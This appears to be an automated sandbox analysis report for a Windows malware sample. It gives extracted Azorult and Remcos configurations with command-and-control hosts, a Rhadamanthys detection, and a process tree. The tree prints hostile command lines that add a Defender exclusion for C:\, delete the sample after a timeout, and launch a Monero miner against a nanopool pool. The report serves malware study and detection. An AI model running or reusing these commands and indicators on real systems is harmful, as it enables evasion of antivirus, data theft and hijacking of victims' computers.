Analysis
-
max time kernel
149s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
16-03-2023 16:31
Static task
static1
Behavioral task
behavioral1
Sample
688774feec1cc9685acaece804dc7a26.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
688774feec1cc9685acaece804dc7a26.exe
Resource
win10v2004-20230220-en
General
-
Target
688774feec1cc9685acaece804dc7a26.exe
-
Size
2.8MB
-
MD5
688774feec1cc9685acaece804dc7a26
-
SHA1
68afac92caeb49c2bb96970138738844aa7b8f99
-
SHA256
a54493e71a7f28fe61e607ba4c089ada71e13ff9e1df6cef5619a4163e2b0a1f
-
SHA512
68467b861e163b4b0ff7477c3c780eb3141ae069e8145431798576a1da74347b0da6fa0a0ad19defc3e0d29bdfb29240bffa12ef2d1904697a6e52f965da041a
-
SSDEEP
24576:oafQKgqtAyrUFdRZTbwcXE1Rw2qs9kpu2ny/v/LtGZsYjot0+iEzyLU/E5h8bV2:oNwcXFoaU/E5h8bKlsyKqiB8tFg
Malware Config
Extracted
azorult
http://195.245.112.115/index.php
Extracted
remcos
03162023
nikahuve.ac.ug:65213
kalskala.ac.ug:65213
tuekisaa.ac.ug:65213
parthaha.ac.ug:65213
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
revcs.exe
-
copy_folder
sdf
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
true
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
true
-
keylog_file
vgcqfxs.dat
-
keylog_flag
false
-
keylog_folder
fsscbas
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
fdvcmhjdf-Z4BK1G
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remvc
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
notepad;solitaire;
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Detect rhadamanthys stealer shellcode 4 IoCs
Processes:
resource yara_rule behavioral2/memory/744-169-0x0000000000F50000-0x0000000000F6C000-memory.dmp family_rhadamanthys behavioral2/memory/744-171-0x0000000000F50000-0x0000000000F6C000-memory.dmp family_rhadamanthys behavioral2/memory/744-174-0x0000000000F50000-0x0000000000F6C000-memory.dmp family_rhadamanthys behavioral2/memory/744-181-0x0000000000F50000-0x0000000000F6C000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
AEDD.tmp.exeB595.tmp.exeBBD0.tmp.exe688774feec1cc9685acaece804dc7a26.exeAEDD.tmp.exeBBD0.tmp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation AEDD.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation B595.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation BBD0.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation 688774feec1cc9685acaece804dc7a26.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation AEDD.tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation BBD0.tmp.exe -
Executes dropped EXE 8 IoCs
Processes:
AEDD.tmp.exeAEDD.tmp.exeB595.tmp.exeBBD0.tmp.exeB595.tmp.exeBBD0.tmp.exeB595.tmp.exeB595.tmp.exepid process 4904 AEDD.tmp.exe 4548 AEDD.tmp.exe 1644 B595.tmp.exe 1784 BBD0.tmp.exe 3340 B595.tmp.exe 1684 BBD0.tmp.exe 4456 B595.tmp.exe 4220 B595.tmp.exe -
Loads dropped DLL 4 IoCs
Processes:
AEDD.tmp.exepid process 4548 AEDD.tmp.exe 4548 AEDD.tmp.exe 4548 AEDD.tmp.exe 4548 AEDD.tmp.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook dllhost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
BBD0.tmp.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Picxpsdvu = "\"C:\\Users\\Admin\\AppData\\Roaming\\Omsae\\Picxpsdvu.exe\"" BBD0.tmp.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
688774feec1cc9685acaece804dc7a26.exepid process 744 688774feec1cc9685acaece804dc7a26.exe 744 688774feec1cc9685acaece804dc7a26.exe 744 688774feec1cc9685acaece804dc7a26.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
688774feec1cc9685acaece804dc7a26.exeAEDD.tmp.exeB595.tmp.exeBBD0.tmp.exeB595.tmp.exeB595.tmp.exedescription pid process target process PID 1392 set thread context of 744 1392 688774feec1cc9685acaece804dc7a26.exe 688774feec1cc9685acaece804dc7a26.exe PID 4904 set thread context of 4548 4904 AEDD.tmp.exe AEDD.tmp.exe PID 1644 set thread context of 3340 1644 B595.tmp.exe B595.tmp.exe PID 1784 set thread context of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 4456 set thread context of 4220 4456 B595.tmp.exe B595.tmp.exe PID 4220 set thread context of 992 4220 B595.tmp.exe AddInProcess.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AEDD.tmp.exedllhost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AEDD.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AEDD.tmp.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5096 timeout.exe -
Modifies registry class 1 IoCs
Processes:
BBD0.tmp.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings BBD0.tmp.exe -
Suspicious behavior: EnumeratesProcesses 43 IoCs
Processes:
powershell.exe688774feec1cc9685acaece804dc7a26.exedllhost.exeAEDD.tmp.exepowershell.exepowershell.exepowershell.exeB595.tmp.exepid process 2240 powershell.exe 2240 powershell.exe 744 688774feec1cc9685acaece804dc7a26.exe 744 688774feec1cc9685acaece804dc7a26.exe 3644 dllhost.exe 3644 dllhost.exe 3644 dllhost.exe 3644 dllhost.exe 4548 AEDD.tmp.exe 4548 AEDD.tmp.exe 1976 powershell.exe 1976 powershell.exe 2716 powershell.exe 2716 powershell.exe 660 powershell.exe 660 powershell.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe 4220 B595.tmp.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
powershell.exe688774feec1cc9685acaece804dc7a26.exeAEDD.tmp.exeB595.tmp.exepowershell.exeBBD0.tmp.exepowershell.exeB595.tmp.exepowershell.exeB595.tmp.exeB595.tmp.exeAddInProcess.exedescription pid process Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 1392 688774feec1cc9685acaece804dc7a26.exe Token: SeDebugPrivilege 4904 AEDD.tmp.exe Token: SeDebugPrivilege 1644 B595.tmp.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 1784 BBD0.tmp.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 3340 B595.tmp.exe Token: SeDebugPrivilege 660 powershell.exe Token: SeDebugPrivilege 4456 B595.tmp.exe Token: SeDebugPrivilege 4220 B595.tmp.exe Token: SeLockMemoryPrivilege 992 AddInProcess.exe Token: SeLockMemoryPrivilege 992 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AddInProcess.exepid process 992 AddInProcess.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
BBD0.tmp.exepid process 1684 BBD0.tmp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
688774feec1cc9685acaece804dc7a26.exe688774feec1cc9685acaece804dc7a26.exeAEDD.tmp.exeB595.tmp.exeBBD0.tmp.exeAEDD.tmp.execmd.execmd.exeB595.tmp.exeB595.tmp.exedescription pid process target process PID 1392 wrote to memory of 2240 1392 688774feec1cc9685acaece804dc7a26.exe powershell.exe PID 1392 wrote to memory of 2240 1392 688774feec1cc9685acaece804dc7a26.exe powershell.exe PID 1392 wrote to memory of 2240 1392 688774feec1cc9685acaece804dc7a26.exe powershell.exe PID 1392 wrote to memory of 744 1392 688774feec1cc9685acaece804dc7a26.exe 688774feec1cc9685acaece804dc7a26.exe PID 1392 wrote to memory of 744 1392 688774feec1cc9685acaece804dc7a26.exe 688774feec1cc9685acaece804dc7a26.exe PID 1392 wrote to memory of 744 1392 688774feec1cc9685acaece804dc7a26.exe 688774feec1cc9685acaece804dc7a26.exe PID 1392 wrote to memory of 744 1392 688774feec1cc9685acaece804dc7a26.exe 688774feec1cc9685acaece804dc7a26.exe PID 1392 wrote to memory of 744 1392 688774feec1cc9685acaece804dc7a26.exe 688774feec1cc9685acaece804dc7a26.exe PID 1392 wrote to memory of 744 1392 688774feec1cc9685acaece804dc7a26.exe 688774feec1cc9685acaece804dc7a26.exe PID 1392 wrote to memory of 744 1392 688774feec1cc9685acaece804dc7a26.exe 688774feec1cc9685acaece804dc7a26.exe PID 1392 wrote to memory of 744 1392 688774feec1cc9685acaece804dc7a26.exe 688774feec1cc9685acaece804dc7a26.exe PID 1392 wrote to memory of 744 1392 688774feec1cc9685acaece804dc7a26.exe 688774feec1cc9685acaece804dc7a26.exe PID 744 wrote to memory of 3644 744 688774feec1cc9685acaece804dc7a26.exe dllhost.exe PID 744 wrote to memory of 3644 744 688774feec1cc9685acaece804dc7a26.exe dllhost.exe PID 744 wrote to memory of 3644 744 688774feec1cc9685acaece804dc7a26.exe dllhost.exe PID 744 wrote to memory of 3644 744 688774feec1cc9685acaece804dc7a26.exe dllhost.exe PID 4904 wrote to memory of 4548 4904 AEDD.tmp.exe AEDD.tmp.exe PID 4904 wrote to memory of 4548 4904 AEDD.tmp.exe AEDD.tmp.exe PID 4904 wrote to memory of 4548 4904 AEDD.tmp.exe AEDD.tmp.exe PID 4904 wrote to memory of 4548 4904 AEDD.tmp.exe AEDD.tmp.exe PID 4904 wrote to memory of 4548 4904 AEDD.tmp.exe AEDD.tmp.exe PID 4904 wrote to memory of 4548 4904 AEDD.tmp.exe AEDD.tmp.exe PID 4904 wrote to memory of 4548 4904 AEDD.tmp.exe AEDD.tmp.exe PID 4904 wrote to memory of 4548 4904 AEDD.tmp.exe AEDD.tmp.exe PID 4904 wrote to memory of 4548 4904 AEDD.tmp.exe AEDD.tmp.exe PID 1644 wrote to memory of 3340 1644 B595.tmp.exe B595.tmp.exe PID 1644 wrote to memory of 3340 1644 B595.tmp.exe B595.tmp.exe PID 1644 wrote to memory of 3340 1644 B595.tmp.exe B595.tmp.exe PID 1644 wrote to memory of 3340 1644 B595.tmp.exe B595.tmp.exe PID 1644 wrote to memory of 3340 1644 B595.tmp.exe B595.tmp.exe PID 1644 wrote to memory of 3340 1644 B595.tmp.exe B595.tmp.exe PID 1784 wrote to memory of 1976 1784 BBD0.tmp.exe powershell.exe PID 1784 wrote to memory of 1976 1784 BBD0.tmp.exe powershell.exe PID 1784 wrote to memory of 1976 1784 BBD0.tmp.exe powershell.exe PID 4548 wrote to memory of 5044 4548 AEDD.tmp.exe cmd.exe PID 4548 wrote to memory of 5044 4548 AEDD.tmp.exe cmd.exe PID 4548 wrote to memory of 5044 4548 AEDD.tmp.exe cmd.exe PID 5044 wrote to memory of 5096 5044 cmd.exe timeout.exe PID 5044 wrote to memory of 5096 5044 cmd.exe timeout.exe PID 5044 wrote to memory of 5096 5044 cmd.exe timeout.exe PID 1784 wrote to memory of 376 1784 BBD0.tmp.exe cmd.exe PID 1784 wrote to memory of 376 1784 BBD0.tmp.exe cmd.exe PID 1784 wrote to memory of 376 1784 BBD0.tmp.exe cmd.exe PID 376 wrote to memory of 2716 376 cmd.exe powershell.exe PID 376 wrote to memory of 2716 376 cmd.exe powershell.exe PID 376 wrote to memory of 2716 376 cmd.exe powershell.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 1784 wrote to memory of 1684 1784 BBD0.tmp.exe BBD0.tmp.exe PID 3340 wrote to memory of 660 3340 B595.tmp.exe powershell.exe PID 3340 wrote to memory of 660 3340 B595.tmp.exe powershell.exe PID 4456 wrote to memory of 4220 4456 B595.tmp.exe B595.tmp.exe PID 4456 wrote to memory of 4220 4456 B595.tmp.exe B595.tmp.exe PID 4456 wrote to memory of 4220 4456 B595.tmp.exe B595.tmp.exe PID 4456 wrote to memory of 4220 4456 B595.tmp.exe B595.tmp.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe -
outlook_win_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\688774feec1cc9685acaece804dc7a26.exe"C:\Users\Admin\AppData\Local\Temp\688774feec1cc9685acaece804dc7a26.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\688774feec1cc9685acaece804dc7a26.exeC:\Users\Admin\AppData\Local\Temp\688774feec1cc9685acaece804dc7a26.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dllhost.exe"C:\Windows\system32\dllhost.exe"3⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
-
C:\Users\Admin\AppData\Local\Temp\AEDD.tmp.exe"C:\Users\Admin\AppData\Local\Temp\AEDD.tmp.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AEDD.tmp.exeC:\Users\Admin\AppData\Local\Temp\AEDD.tmp.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "AEDD.tmp.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\B595.tmp.exe"C:\Users\Admin\AppData\Local\Temp\B595.tmp.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\B595.tmp.exeC:\Users\Admin\AppData\Local\Temp\B595.tmp.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 3; Set-MpPreference -ExclusionPath C:\3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BBD0.tmp.exe"C:\Users\Admin\AppData\Local\Temp\BBD0.tmp.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BBD0.tmp.exeC:\Users\Admin\AppData\Local\Temp\BBD0.tmp.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fhhpuyrmeopvjuwpnwfqp.vbs"3⤵
-
C:\Users\Admin\AppData\Roaming\B595.tmp.exeC:\Users\Admin\AppData\Roaming\B595.tmp.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\B595.tmp.exeC:\Users\Admin\AppData\Roaming\B595.tmp.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.worker1 -p x --algo rx/0 --cpu-max-threads-hint=503⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\B595.tmp.exe.logFilesize
1KB
MD5cbe207895aa962105ca913568f7d2135
SHA1c62bcc9aac6f6ad0b14457d3d51c0a474528b106
SHA256bd468d112dd92eab9177b172cb46016d96c6d85fe567734852f8c07733c14a24
SHA5123a93a75b1c3a93d8466a7b2f5b0433805d7055e829834203b3b6ae48ecb899f3aaf68610057a0ce0f9a29647cd7c6577dcb4c89124dc368e91f5866a5dbf1e44
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD525d06e9b8695ee46301fdf04eb2e9e27
SHA1c3d50d285cbf3a6928495b855bc0089a721f8095
SHA256f859819845ae63c01397d2e56957991a23a6669f55d17ad0bf3047d24d188271
SHA5121bea08e5ede25561726cfdb0b8592fe2fd95dddb59eec84d7030747a648a0414e6d77b1d274a336eef27804acca4884cc0bf8aa79900be36ec66e313be103c9f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD57f263192768e3d76575f9a9ea4d40564
SHA16d3611a9a4a0506ad00f4b0de13012288e8e1e2f
SHA256be812dcae49b56a13e4efbd4ef37a5beebefc7364a95bcb20de987ff27d7f0d8
SHA512da0f5df9a7227cf803866524b1d98a5199857497f3fd75ab2325be1783eb1761598126900109fef92d7ea33c991f361461c939d94e6e77dcaf0336cd1283c4fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5ed7ae27b4c2696918b5a1706e8ab7a54
SHA164828847bc6cb50772310dff26764063062fb180
SHA256972fb470b060c18d073a34aaa898c10ba0a427356b49d18c69a746b9bd0c54ee
SHA512abd193637b01771807d1db62e28ee3cc7ce8a8ab39f587bdb163ffa80417cd089e401153ec5c74048e4eeef60ece18568484940d762e3193ef0889fe7cd8837b
-
C:\Users\Admin\AppData\Local\Temp\AEDD.tmp.exeFilesize
2.8MB
MD5938817d3e634cfb8a9d3ac2840f76863
SHA1271f98e2096ca0f269b619a50063dd0683e73654
SHA256e7ab444923133b71a9c88f388e6a53a592c8e065a8fd79ce2b4568da0a471cc7
SHA512cfba6ed98b6091709c0ec15924afad8e82c38a26f274e14e3b5eb5f83a53c432b83dc2e8a5db141487cc372f4b6468dde5a7fd00de9cdc90c7fb8c4d7207580d
-
C:\Users\Admin\AppData\Local\Temp\AEDD.tmp.exeFilesize
2.8MB
MD5938817d3e634cfb8a9d3ac2840f76863
SHA1271f98e2096ca0f269b619a50063dd0683e73654
SHA256e7ab444923133b71a9c88f388e6a53a592c8e065a8fd79ce2b4568da0a471cc7
SHA512cfba6ed98b6091709c0ec15924afad8e82c38a26f274e14e3b5eb5f83a53c432b83dc2e8a5db141487cc372f4b6468dde5a7fd00de9cdc90c7fb8c4d7207580d
-
C:\Users\Admin\AppData\Local\Temp\AEDD.tmp.exeFilesize
2.8MB
MD5938817d3e634cfb8a9d3ac2840f76863
SHA1271f98e2096ca0f269b619a50063dd0683e73654
SHA256e7ab444923133b71a9c88f388e6a53a592c8e065a8fd79ce2b4568da0a471cc7
SHA512cfba6ed98b6091709c0ec15924afad8e82c38a26f274e14e3b5eb5f83a53c432b83dc2e8a5db141487cc372f4b6468dde5a7fd00de9cdc90c7fb8c4d7207580d
-
C:\Users\Admin\AppData\Local\Temp\B595.tmp.exeFilesize
3.6MB
MD520d27d8d88014215720e53218998dc59
SHA1392a43d9a4ac4feb0731552d3bb4cbc5801bb862
SHA256a81da88f6e47eeb58b864d01b09ed273421ab6e1b9b3c5f763f47a913b5b2ff3
SHA512579ccc664bdee663bc1ca05a3b7fb4fd7ff65d58b669159450a5787cff7c09e3a8bf70b9f2ce1fa594b7e920b474473168c7e7a13293b8f7d7625aec0f3af439
-
C:\Users\Admin\AppData\Local\Temp\B595.tmp.exeFilesize
3.6MB
MD520d27d8d88014215720e53218998dc59
SHA1392a43d9a4ac4feb0731552d3bb4cbc5801bb862
SHA256a81da88f6e47eeb58b864d01b09ed273421ab6e1b9b3c5f763f47a913b5b2ff3
SHA512579ccc664bdee663bc1ca05a3b7fb4fd7ff65d58b669159450a5787cff7c09e3a8bf70b9f2ce1fa594b7e920b474473168c7e7a13293b8f7d7625aec0f3af439
-
C:\Users\Admin\AppData\Local\Temp\B595.tmp.exeFilesize
3.6MB
MD520d27d8d88014215720e53218998dc59
SHA1392a43d9a4ac4feb0731552d3bb4cbc5801bb862
SHA256a81da88f6e47eeb58b864d01b09ed273421ab6e1b9b3c5f763f47a913b5b2ff3
SHA512579ccc664bdee663bc1ca05a3b7fb4fd7ff65d58b669159450a5787cff7c09e3a8bf70b9f2ce1fa594b7e920b474473168c7e7a13293b8f7d7625aec0f3af439
-
C:\Users\Admin\AppData\Local\Temp\BBD0.tmp.exeFilesize
3.1MB
MD5520a5d096ab0c9095aac940617c5acf6
SHA1d76821fb07ee23971a105f9427d5e7d005c8c720
SHA2560fd2e8f4ce5b3c6f3ecf206683da7e3474781c3f6edf4c384f9af4805e65e6dd
SHA5122b580385b02d2adc0058ec25ef1c3520493f3812111e36515e0069ea26e40182e619539db909f4baa8ec40cc7cd5e904536c52d575f5ba77d578ea6cf7f2b596
-
C:\Users\Admin\AppData\Local\Temp\BBD0.tmp.exeFilesize
3.1MB
MD5520a5d096ab0c9095aac940617c5acf6
SHA1d76821fb07ee23971a105f9427d5e7d005c8c720
SHA2560fd2e8f4ce5b3c6f3ecf206683da7e3474781c3f6edf4c384f9af4805e65e6dd
SHA5122b580385b02d2adc0058ec25ef1c3520493f3812111e36515e0069ea26e40182e619539db909f4baa8ec40cc7cd5e904536c52d575f5ba77d578ea6cf7f2b596
-
C:\Users\Admin\AppData\Local\Temp\BBD0.tmp.exeFilesize
3.1MB
MD5520a5d096ab0c9095aac940617c5acf6
SHA1d76821fb07ee23971a105f9427d5e7d005c8c720
SHA2560fd2e8f4ce5b3c6f3ecf206683da7e3474781c3f6edf4c384f9af4805e65e6dd
SHA5122b580385b02d2adc0058ec25ef1c3520493f3812111e36515e0069ea26e40182e619539db909f4baa8ec40cc7cd5e904536c52d575f5ba77d578ea6cf7f2b596
-
